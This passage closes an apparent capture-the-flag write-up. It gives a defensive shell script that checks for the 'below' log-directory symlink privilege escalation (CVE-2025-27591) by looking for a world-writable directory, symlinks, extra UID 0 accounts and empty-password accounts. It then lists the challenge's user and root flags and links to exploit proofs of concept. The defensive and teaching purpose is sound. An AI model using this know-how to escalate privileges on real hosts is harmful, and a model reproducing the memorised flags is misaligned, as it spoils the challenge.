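As an added example (mine, not from the writeup or from the `below` project), these are the checks a defender, or a tester confirming the precondition before firing the one-liner, would run: whether the log directory is world-writable without the sticky bit, whether anything inside it is a symlink, and whether `/etc/passwd` has picked up extra UID 0 or password-less accounts like the `pwn` line above. Every function takes an optional path so it can be exercised against constructed files; `/var/log/below` and `/etc/passwd` are only the defaults.

```bash
#!/bin/sh
# Added example (not from the writeup or from the below project): checks for
# the precondition and the artefacts of the /var/log/below symlink attack.
# Each function takes an optional path so it can run against constructed
# files; the live-system defaults are /var/log/below and /etc/passwd.

# Classify the log directory's mode from its `ls -ld` string:
#   absent          directory does not exist
#   sticky          world-writable but with the sticky bit (/tmp-style)
#   world-writable  others can create/replace entries: the vulnerable state
#   ok              not world-writable
below_dir_mode() {
    dir=${1:-/var/log/below}
    [ -d "$dir" ] || { echo absent; return 0; }
    mode=$(ls -ld "$dir" | cut -c1-10)       # e.g. drwxrwxrwx
    case "$mode" in
        *[tT])       echo sticky ;;
        ????????w?)  echo world-writable ;;
        *)           echo ok ;;
    esac
}

# Print every symlink directly inside the log directory as "link -> target".
# Returns 1 when at least one exists (below itself never creates symlinks).
below_symlinks() {
    dir=${1:-/var/log/below}
    [ -d "$dir" ] || return 0
    find "$dir" -maxdepth 1 -type l -exec sh -c \
        'printf "%s -> %s\n" "$1" "$(readlink "$1")"' _ {} \;
    [ -z "$(find "$dir" -maxdepth 1 -type l)" ]
}

# Accounts with UID 0 other than root: what the `pwn::0:0:...` line adds.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "${1:-/etc/passwd}"
}

# Accounts whose passwd password field is empty: no shadow lookup and no
# password prompt for `su`.
empty_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "${1:-/etc/passwd}"
}

# Usage on the live system
printf '/var/log/below: %s\n' "$(below_dir_mode)"
below_symlinks || echo 'symlink(s) present in /var/log/below'
extra_uid0_accounts
empty_password_accounts
```

On a patched host (`below` 0.9.0 or later) the directory should report `ok`, and any symlink under it or any second UID 0 account is worth treating as an indicator of this exploit rather than a configuration quirk.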
# **Flags**
> [!tldr]- User
>
> `9b42bc6b1f3c383b2c06ee24ce31666a`
> [!tldr]- Root
>
> `11a0209a59511aed084b10ea1d141d38`
# **References**
- [CVE-2025-49113](https://www.offsec.com/blog/cve-2025-49113/)
- [CVE-2025-49113 POC](https://github.com/fearsoff-org/CVE-2025-49113)
- [Statically Linked socat](https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat)
- [Roundcube - Decrypt password from session-vars](https://www.roundcubeforum.net/index.php?topic=23399.0)
- [Roundcube Source Code](https://github.com/roundcube/roundcubemail/blob/master/program/lib/Roundcube/rcube.php#L845)
- [CVE-2025-27591](https://nvd.nist.gov/vuln/detail/CVE-2025-27591)
- [CVE-2025-27591 POC](https://github.com/rvizx/CVE-2025-27591)